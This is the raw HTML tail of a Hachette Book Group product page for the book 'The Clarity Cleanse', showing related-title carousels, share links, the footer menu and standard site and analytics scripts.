								<img width="190" height="240" src="" class="lazyload orientation-portrait" alt="Do Big Small Things" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2017/09/9780762460625.jpg?fit=190%2C240" />							</a>
						</div>
					</div>
									<div class="item carousel__slide">
						<div class="carousel__slide-content">
							<a href="https://www.hachettebookgroup.com/titles/jane-seymour/open-hearts-family/9780762449187/" aria-label="Open Hearts Family">
								<img width="190" height="212" src="" class="lazyload orientation-portrait" alt="Open Hearts Family" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2017/09/9780762449187.jpg?fit=190%2C212" />							</a>
						</div>
					</div>
									<div class="item carousel__slide">
						<div class="carousel__slide-content">
							<a href="https://www.hachettebookgroup.com/titles/katherine-jenkins/lessons-from-the-monk-i-married/9781580054515/" aria-label="Lessons from the Monk I Married">
								<img width="190" height="242" src="" class="lazyload orientation-portrait" alt="Lessons from the Monk I Married" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2017/09/9781580054515.jpg?fit=190%2C242" />							</a>
						</div>
					</div>
							</div>
			<a class="left carousel-control site-carousel__control--prev" href="#titles-carousel-496555-carousel" role="button" aria-label="Left Arrow">
				
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="title-left-arrow-1586120362  desc-left-arrow-1865807716">
	<title id="title-left-arrow-1586120362">Left Arrow</title>
	<desc id="desc-left-arrow-1865807716">Left arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
			</a>
			<a class="right carousel-control site-carousel__control--next" href="#titles-carousel-496555-carousel" role="button" aria-label="Right Arrow">
				
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="title-right-arrow-127762832  desc-right-arrow-397812774">
	<title id="title-right-arrow-127762832">Right Arrow</title>
	<desc id="desc-right-arrow-397812774">Right arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
			</a>
		</div>
	</div>
</div>
		</div>
					<div class="landing-page-module module-posts-carousel__7 "
					>
			
<div class="posts-carousel module module--fixed">
	
<div class="module__content">
	<div id="posts-carousel-1155598188" class="carousel slide" data-desktop-slide-items="3" data-mobile-slide-items="1" data-desktop-slide-rows="1">
		<h2 class="module-header module-header--default-center">You May Also Like . . .</h2>

		<ol class="carousel-indicators">
						<li data-target="#posts-carousel-1155598188" data-slide-to="0"></li>
					</ol>

		<div class="carousel-inner" role="listbox">
			<div class="item carousel__slide">
									<article class="posts-carousel__article">
						<a href="https://www.hachettebookgroup.com/landing-page/new-year-new-you-2019/" class="carousel__slide-content">
							<div class="posts-carousel__image">
								<img width="768" height="402" src="" class="lazyload orientation-landscape" alt="Best Books for New Year New You" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2018/01/Featured-Image-New-Year-New-You-2019-copy.png?fit=768%2C402" />							</div>
							<div class="posts-carousel__text">
								<h3>Books for a New Year &amp; a New You</h3>
															</div>
						</a>
					</article>
							</div>
		</div>

		<a class="left carousel-control site-carousel__control--prev" href="#posts-carousel-1155598188" role="button" aria-label="Left Arrow" data-slide="prev">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="title-left-arrow-2838094020  desc-left-arrow-1646757693">
	<title id="title-left-arrow-2838094020">Left Arrow</title>
	<desc id="desc-left-arrow-1646757693">Left arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
		</a>
		<a class="right carousel-control site-carousel__control--next" href="#posts-carousel-1155598188" role="button" aria-label="Right Arrow" data-slide="next">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="title-right-arrow-757810235  desc-right-arrow-188278028">
	<title id="title-right-arrow-757810235">Right Arrow</title>
	<desc id="desc-right-arrow-188278028">Right arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
		</a>
	</div>
</div>
</div>
		</div>
		<div class="share module module--fixed">
	<div class="module__content module--fixed">
		<ul class="site__share">
			<li class="site__share-prompt">Share</li>
			<li class="share-facebook">
				<a href="//www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.hachettebookgroup.com%2Ftitles%2Fdr-habib-sadeghi%2Fthe-clarity-cleanse%2F9781455542222%2F" target="_blank"
					data-type="link-event" data-category="Social Share" data-action="Click to Share" data-label="Facebook"
				>
					
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-facebook-icon-1228299023  desc-facebook-icon-2371906561">
	<title id="title-facebook-icon-1228299023">Facebook Icon</title>
	<desc id="desc-facebook-icon-2371906561">Round FB icon with f initial</desc>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm4.47,19.37H21.06V30.44H16.23c0-3.41,0-7.4,0-11H14.18V15.93h2c.1-2.55.14-5.07,1.41-6.36C19,8.12,20.4,8.3,24.55,8.3v3.56s-2.63-.26-3.29.75c-.36.55-.15,2.16-.18,3.32h3.49C24.27,17.28,24.06,18.2,23.84,19.37Z" transform="translate(0 0.01)"/></svg>
				</a>
			</li>
			<li class="share-twitter">
				<a href="//twitter.com/intent/tweet?url=https%3A%2F%2Fwww.hachettebookgroup.com%2Ftitles%2Fdr-habib-sadeghi%2Fthe-clarity-cleanse%2F9781455542222%2F&#038;text=The%20Clarity%20Cleanse" target="_blank"
					data-type="link-event" data-category="Social Share" data-action="Click to Share" data-label="Twitter"
				>
					
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-twitter-icon-3372877191  desc-twitter-icon-865556991">
	<title id="title-twitter-icon-3372877191">Twitter Icon</title>
	<desc id="desc-twitter-icon-865556991">Twitter Logo</desc>
	<path role="presentation" role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.32,13.62a6.18,6.18,0,0,1-1.3,1.49l-.6.47A11,11,0,0,1,26.62,18a10.69,10.69,0,0,1-7.49,8.45,11.45,11.45,0,0,1-5.41.22A13.94,13.94,0,0,1,11.47,26a9,9,0,0,1-1.08-.56l-.34-.2a6.24,6.24,0,0,0,1.22,0c.38-.06.74,0,1.09-.12a7.83,7.83,0,0,0,2.29-.83,4.25,4.25,0,0,0,1-.68,3.25,3.25,0,0,1-1.14-.2A3.84,3.84,0,0,1,12.14,21c.37,0,1.45.14,1.71-.07a2.79,2.79,0,0,1-1.25-.5,3.68,3.68,0,0,1-1.8-3.27l.39.19a4.2,4.2,0,0,0,.8.22,1.15,1.15,0,0,0,.52,0h0c-.19-.22-.51-.37-.7-.61a3.91,3.91,0,0,1-.86-3.47,4.43,4.43,0,0,1,.41-1h0a2.33,2.33,0,0,0,.35.4A7,7,0,0,0,12.85,14a11.25,11.25,0,0,0,4.67,2.26,7.31,7.31,0,0,0,1.72.22,3.55,3.55,0,0,1,0-1.79,3.77,3.77,0,0,1,2.16-2.57,4.64,4.64,0,0,1,.85-.26l.47-.06a3.93,3.93,0,0,1,3,1.2,6.2,6.2,0,0,0,2-.66l.48-.26a3.82,3.82,0,0,1-1.24,1.79,1.82,1.82,0,0,1-.42.3h0a7.15,7.15,0,0,0,2.16-.59Z" transform="translate(0 0)"/></svg>
				</a>
			</li>
			<li class="share-email">
				<a href="mailto:friend@example.com?subject=Check%20this%20out.&#038;body=The%20Clarity%20Cleanse%0D%0A%0D%0A%0D%0A%0D%0Ahttps%3A%2F%2Fwww.hachettebookgroup.com%2Ftitles%2Fdr-habib-sadeghi%2Fthe-clarity-cleanse%2F9781455542222%2F"
					data-type="link-event" data-category="Social Share" data-action="Click to Share" data-label="Email"
				>
					
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-email-icon-1466816917  desc-email-icon-3564761902">
	<title id="title-email-icon-1466816917">Email Icon</title>
	<desc id="desc-email-icon-3564761902">Envelope</desc>
	<path role="presentation" class="cls-1" d="M8.38,12.53a.64.64,0,0,0,0,.09V26.1l6.29-7.48Z" transform="translate(0 0)"/>
	<polygon role="presentation" class="cls-1" points="29.58 11.97 9.17 11.97 19.37 19.94 29.58 11.97"/>
	<polygon role="presentation" class="cls-1" points="19.37 23.18 16.46 20.36 9.07 26.83 29.68 26.83 22.29 20.36 19.37 23.18"/>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0ZM31.83,26.72a1.57,1.57,0,0,1-.36,1,.55.55,0,0,1-.21.21,1.44,1.44,0,0,1-1,.36H8.45a1.5,1.5,0,0,1-1-.37.58.58,0,0,1-.2-.21,1.5,1.5,0,0,1-.35-1V12a1.59,1.59,0,0,1,.36-1,.74.74,0,0,1,.29-.27,1.39,1.39,0,0,1,.89-.31H30.29a1.5,1.5,0,0,1,.7.18l0-.05.66.63-.06,0a1.58,1.58,0,0,1,.21.78Z" transform="translate(0 0)"/>
	<path role="presentation" class="cls-1" d="M24.08,18.62l6.29,7.48V12.62a.64.64,0,0,0,0-.09Z" transform="translate(0 0)"/></svg>
				</a>
			</li>
		</ul>
	</div>
</div>
				
<footer class="site-footer">
	<div class="site-footer__logo">
		
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 59.72 59.73" role="img" aria-labelledby="title-hachette-logo-ini-3445876687  desc-hachette-logo-ini-462682415">
<title id="title-hachette-logo-ini-3445876687">Hachette Logo</title>
<desc id="desc-hachette-logo-ini-462682415">Large H Initial</desc>
<polygon role="presentation" class="initial-logo-cls-1" points="59.72 59.73 59.72 0 36.93 0 36.93 4.33 55.4 4.33 55.4 55.4 41.26 55.4 41.26 36.93 18.46 36.93 18.46 41.26 36.93 41.26 36.93 59.73 59.72 59.73"/>
<polygon role="presentation" class="initial-logo-cls-1" points="22.79 18.47 41.26 18.47 41.26 22.79 18.47 22.79 18.47 4.33 4.33 4.33 4.33 55.4 22.79 55.4 22.79 59.73 0 59.73 0 0 22.79 0 22.79 18.47"/></svg>
	</div>
	<nav class="site-footer__menus">
		
<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-about" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-about">
			About			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-about">
			<ul id="menu-about" class="menu"><li id="menu-item-647353" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-647353"><a href="/landing-page/about-hachette-book-group-2/">About Us</a></li>
<li id="menu-item-478324" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478324"><a href="https://www.hachettebookgroup.com/leadership/">Our Leadership</a></li>
<li id="menu-item-478335" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478335"><a href="https://www.hachettebookgroup.com/imprints/">Imprints</a></li>
<li id="menu-item-550778" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-550778"><a href="https://www.hachettebookgroup.com/newsletters/">Newsletter Subscription</a></li>
<li id="menu-item-1192194" class="menu-item menu-item-type-post_type menu-item-object-landing-page menu-item-1192194"><a href="https://www.hachettebookgroup.com/landing-page/freedom-of-expression/">Freedom of Expression</a></li>
<li id="menu-item-1204864" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1204864"><a href="/landing-page/social-impact-at-hbg/">Social Impact at HBG</a></li>
<li id="menu-item-478329" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478329"><a href="https://www.hachettebookgroup.com/about/hbg-in-the-news/">HBG In the News</a></li>
<li id="menu-item-478328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478328"><a href="https://www.hachettebookgroup.com/press-publicity/">Press &amp; Publicity</a></li>
</ul>		</div>
	</li>
</ul>

<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-resources" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-resources">
			Resources			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-resources">
			<ul id="menu-resources" class="menu"><li id="menu-item-230735" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230735"><a target="_blank" rel="noopener" href="https://authorportal.hbgusa.com">Authors &#038; Agents</a></li>
<li id="menu-item-230733" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230733"><a target="_blank" rel="noopener" href="https://www.hachettebookgroup.com/landing-page/hbg-booksellers/">Booksellers</a></li>
<li id="menu-item-230734" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230734"><a target="_blank" rel="noopener" href="https://www.hachettebookgroup.com/landing-page/client-services/">Client Services</a></li>
<li id="menu-item-230736" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230736"><a target="_blank" rel="noopener" href="https://www.hbgresources.com/">Librarians &#038; Educators</a></li>
<li id="menu-item-665775" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-665775"><a href="https://www.hachettebookgroup.com/landing-page/ordersupport">eCommerce Order Support</a></li>
<li id="menu-item-913357" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-913357"><a href="https://www.hachetteacademic.com/">Hachette Academic</a></li>
<li id="menu-item-512066" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-512066"><a href="https://www.hachettebookgroup.com/about/careers/">Careers</a></li>
<li id="menu-item-478333" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-478333"><a href="https://www.hachettebookgroup.com/landing-page/contact-us-2">Contact HBG</a></li>
<li id="menu-item-478352" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478352"><a href="https://www.hachettebookgroup.com/about/faqs/">FAQ</a></li>
</ul>		</div>
	</li>
</ul>

<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-terms-and-policies" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-terms-and-policies">
			Terms and Policies			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-terms-and-policies">
			<ul id="menu-terms-and-policies" class="menu"><li id="menu-item-230741" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230741"><a href="https://www.hachettebookgroup.com/terms-and-policies/terms-of-use/">Terms of Use</a></li>
<li id="menu-item-230740" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-230740"><a href="https://www.hachettebookgroup.com/terms-and-policies/privacy-policy/">Privacy Policy</a></li>
<li id="menu-item-927110" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-927110"><a target="_blank" rel="noopener" href="https://hbgusa.zendesk.com/hc/en-us/articles/360047685472-HBG-CCPA-Privacy-Rights-Tool">Do Not Sell My Personal Information</a></li>
<li id="menu-item-362560" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-362560"><a href="https://www.hachettebookgroup.com/terms-and-policies/report-piracy/">Report Piracy</a></li>
<li id="menu-item-230738" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230738"><a href="https://www.hachettebookgroup.com/terms-and-policies/cpsia/">CPSIA</a></li>
</ul>		</div>
	</li>
</ul>
	</nav>
	<div class="site-footer__copyright">
		© 2022 Hachette Book Group		<br>
		Portions of data on HachetteBookGroup.com are supplied by Books In Print &reg;. Copyright 2022 ProQuest LLC. All rights reserved. All rights in images of books or other publications are reserved by the original copyright owners.	</div>
</footer>
			</div><!-- #content -->
		</div><!-- #page -->
		<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-content/mu-plugins/jetpack-10.8/_inc/build/photon/photon.min.js?ver=20191001' id='jetpack-photon-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.1' id='jquery-ui-core-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/jquery/ui/menu.min.js?ver=1.13.1' id='jquery-ui-menu-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9' id='regenerator-runtime-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0' id='wp-polyfill-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/dist/dom-ready.min.js?ver=ecda74de0221e1c2ce5c57cbb5af09d5' id='wp-dom-ready-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/dist/hooks.min.js?ver=1e58c8c5a32b2e97491080c5b10dc71c' id='wp-hooks-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/dist/i18n.min.js?ver=30fcecb428a0e8383d3776bcdd3a7834' id='wp-i18n-js'></script>
<script type='text/javascript' id='wp-i18n-js-after'>
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
</script>
<script type='text/javascript' id='wp-a11y-js-translations'>
( function( domain, translations ) {
	var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
	localeData[""].domain = domain;
	wp.i18n.setLocaleData( localeData, domain );
} )( "default", { "locale_data": { "messages": { "": {} } } } );
</script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/dist/a11y.min.js?ver=68e470cf840f69530e9db3be229ad4b6' id='wp-a11y-js'></script>
<script type='text/javascript' id='jquery-ui-autocomplete-js-extra'>
/* <![CDATA[ */
var uiAutocompleteL10n = {"noResults":"No results found.","oneResult":"1 result found. Use up and down arrow keys to navigate.","manyResults":"%d results found. Use up and down arrow keys to navigate.","itemSelected":"Item selected."};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.13.1' id='jquery-ui-autocomplete-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-content/themes/hachette/static/js/common.bundle.min.js?ver=7bde73b1ced750991c18' id='hachette-common-js-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2' id='hoverIntent-js'></script>
<script type='text/javascript' id='hachette-site-js-js-extra'>
/* <![CDATA[ */
var newsletter = {"ajax_url":"https:\/\/www.hachettebookgroup.com\/wp-admin\/admin-ajax.php","nonce":"99b50bb73b","duplicate":"Success! You're signed up.","success":"Success! You're signed up.","invalid":"Hm, try another email?","error":"We're sorry, there was an error."};
var mailchimpPopup = {"ajax_url":"https:\/\/www.hachettebookgroup.com\/wp-admin\/admin-ajax.php","nonce":"b910521330","success":"Your preferences have been successfully saved.","error":"We're sorry, there was an error."};
var whatsInside = {"ajaxUrl":"\/wp-admin\/admin-ajax.php?action=zola_preview&zola-auth=c3a36f04cf"};
var lazyTitles = {"ajaxUrl":"\/wp-admin\/admin-ajax.php?action=lazy_title&load-title-auth=ae130a06ac"};
var icons = {"contributor":"https:\/\/www.hachettebookgroup.com\/wp-content\/themes\/hachette\/static\/images\/icons\/contributor.png","hbg-title":"https:\/\/www.hachettebookgroup.com\/wp-content\/themes\/hachette\/static\/images\/icons\/hbg-title.png"};
var geoCountryCode = "US";
var euroUser = "false";
var gdprForAll = "false";
var analytics = {"environAuth":"EVafa-1EU0ArWEPW1vxdeQ","environPreview":"env-24","dataLayer":"dataLayer","containerKey":"GTM-5LRFFXK"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-content/themes/hachette/static/js/hachette-site.bundle.min.js?ver=7bde73b1ced750991c18' id='hachette-site-js-js'></script>
<script type='text/javascript' id='hbg-all-domains-js-js-extra'>
/* <![CDATA[ */
var checkExam = {"ajaxUrl":"https:\/\/www.hachettebookgroup.com\/wp-admin\/admin-ajax.php","nonce":"d439e7f3d6","isbns":["9781455542222","9781455542239","9781478923701","9781455542246"],"button":".zb-btn","link":"exam-copy-link","zola_url":"https:\/\/examcopyrequestform.poweredbyzola.com\/?isbn="};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-content/themes/hachette-book-group/client/build/js/lens-hbg-all-domains.bundle.js?ver=8b854795662651bd9e81' id='hbg-all-domains-js-js'></script>
<script type='text/javascript' src='https://platform.twitter.com/widgets.js?ver=1.0' id='hbg-twitter-widget-js'></script>
<script src='https://stats.wp.com/e-202217.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:10.8',blog:'155679224',post:'679198',tz:'-4',srv:'www.hachettebookgroup.com',hp:'vip'} ]);
	_stq.push([ 'clickTrackerInit', '155679224', '679198' ]);
</script>
	</body>
</html>

